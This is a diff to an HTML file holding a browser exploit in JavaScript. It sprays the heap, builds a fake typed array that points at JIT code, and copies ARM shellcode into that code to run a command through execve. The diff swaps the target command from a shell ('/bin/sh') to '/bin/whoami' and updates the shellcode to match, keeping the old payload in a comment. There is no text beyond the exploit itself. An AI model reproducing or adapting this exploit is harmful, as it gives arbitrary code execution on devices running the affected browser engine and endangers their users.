--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start998");
+alert("start999");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -158,11 +158,13 @@ spray[spray_index][typedarray_index]=vftable;
 spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
 spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x18;//addr;
 spray[spray_index][typedarray_index+0x40/4]=0x6e69622f;
-spray[spray_index][typedarray_index+0x44/4]=0x0068732f;
+spray[spray_index][typedarray_index+0x44/4]=0x6f68772f;
+spray[spray_index][typedarray_index+0x48/4]=0x00696d61;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xc7\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1";    //"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
+var shellcode="\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x24\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x0b\x70\xa0\xe3\x00\x00\x00\xef\x03\x00\xa0\xe3\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50";
+    //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xc7\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1";    //"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
 for(var i=0;i<shellcode.length;i++){
  myarr[0]=shellcode.charCodeAt(i);
  typedarray[jit_index]+=1;
